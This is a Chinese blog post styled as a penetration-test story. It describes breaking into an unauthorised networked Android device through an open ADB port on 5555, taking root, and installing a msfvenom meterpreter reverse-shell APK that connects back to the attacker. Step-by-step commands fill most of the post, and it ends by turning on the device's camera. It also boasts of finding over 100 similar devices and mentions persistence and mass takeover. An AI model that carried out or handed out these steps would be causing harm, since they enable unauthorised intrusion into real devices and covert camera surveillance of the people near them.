[滲透測試]記一次5555端口滲透實戰
還是在大一的時候,看到學長把某個設備搞了下來,還調用了上面的攝像頭,覺得很酷(學長yyds!)。
於是偷偷搞來該設備的ip地址。使用Nmap掃了一下,發現只開啟了5555端口,
當時還沒有意識到什么(發生了腎么事情了),於是又使用了Openvas(現在改名GVM)掃了一下,
哦~,好像..,等等這堆英文是什么東西,百度一下看看...這.(心跳不由得加快了起來)
- 原來它的遠程調試端口是打開的....不是吧這么草率(很喜歡)
ADB
Android Debug Bridge(安卓調試橋) tools。它就是一個命令行窗口,用於通過電腦端與模擬器或者是設備之間的交互。
開始
- 安裝好ADB后,找到ADB的命令手冊,終於可以開始了
adb connect ip地址
adb shell
su
直接獲得了root權限... 很開心
但是如何向學長那樣調攝像頭呢?這困擾了我大一很久。一直到后來接觸到了神器MSF
-
首先創建MSF載荷
msfvenom -p android/meterpreter/reverse_tcp LHOST=自己的IP地址 LPORT=4444 R > msfad.apk
-
把載荷push到設備里面
adb push /root/msfa.apk /sdcard/Download/msfad.apk
查看了下,確實傳上去了
-
到這里,遇到了一個問題,安卓我一點也不懂啊。windows,linux大家都知道怎么通過命令行去執行文件,可是安卓到底怎么去執行文件呢,痛苦面具已戴上。百度走起,,
命令行安裝 安卓apk
-
首先安裝apk
adb shell pm install /sdcard/Download/msfad.apk
也可以在shell里面操作直接 下同
pm install /sdcard/Download/msfad.apk
-
查看一下應用列表
pm list packages -3
找到的這個是 包名
-
要想啟動程序的話還需要一個啟動頁Activity
-
查看應用詳細信息 可以找到這個啟動頁Activity (包含“category.LAUNCHER”的Activity即為啟動頁Activity)
adb shell dumpsys package com.metasploit.stage
-
設置 MSF
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 本機IP set LPORT 4444(本機監聽端口) run
-
啟動程序
adb shell am start com.metasploit.stage/.MainActivity
-
收到meterpreter
-
找到meterpreter的命令 調用攝像頭
webcam_list
wecam_stream
-
ok 到此就先告一段落了 嗯 實現了以后心情其實也就這樣吧
本文章只是用於技術交流,請於24h之內忘記 /滑稽
最后
后來對整個網段進行掃描,發現了100多個同樣的設備
其實以現在的角度來看,能利用的還有很多
1.這個設備還控制另外一些攝像頭,或許同樣可以拿下
2.因為開局就送shell,利用方法還有很多,還可以做很多事情。
3.權限維持,C2上線,批量抓雞。這個真沒必要..
整個過程其實還是挺順利的,並沒有遇到什么阻礙,所以難度也降低很多了。運氣挺好
分享2個鏈接